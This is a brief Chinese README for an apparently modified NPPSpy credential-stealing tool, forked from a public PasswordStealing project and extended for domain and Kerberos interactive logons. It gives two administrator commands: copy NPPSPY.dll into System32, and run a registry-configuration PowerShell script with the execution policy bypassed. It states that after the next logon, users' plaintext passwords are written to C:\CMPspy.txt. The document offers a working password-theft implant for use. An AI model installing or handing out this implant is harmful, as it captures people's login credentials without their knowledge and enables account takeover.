基于 https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy ,增加了LogonDomainName
和Kerberos:Interactive
的支持。
管理员权限执行如下两条命令即可。
copy .\NPPSPY.dll C:\windows\System32\
powershell.exe -Exec Bypass .\ConfigureRegistrySettings.ps1
注销后,重新登陆,明文密码就存放在C:\CMPspy.txt
文件中。